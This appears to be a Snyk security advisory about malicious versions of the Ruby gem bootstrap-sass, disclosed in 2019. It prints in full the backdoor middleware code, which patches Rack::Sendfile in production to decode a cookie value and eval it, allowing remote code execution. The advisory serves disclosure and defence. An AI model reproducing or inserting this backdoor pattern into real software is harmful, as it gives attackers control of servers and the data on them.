Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
- Snyk ID SNYK-RUBY-BOOTSTRAPSASS-174093
- published 3 Apr 2019
- disclosed 26 Mar 2019
- credit Derek Barnes
How to fix?
Avoid using the malicious versions of
bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.
Affected versions of this package are malicious.
lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.
bootstrap-sass gets imported, it also imports the following malicious middleware code that resides on
begin require 'rack/sendfile' if Rails.env.production? Rack::Sendfile.tap do |r| r.send :alias_method, :c, :call r.send(:define_method, :call) do |e| begin x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten.to_s) eval(x) if x rescue Exception end c(e) end end end rescue Exception nil end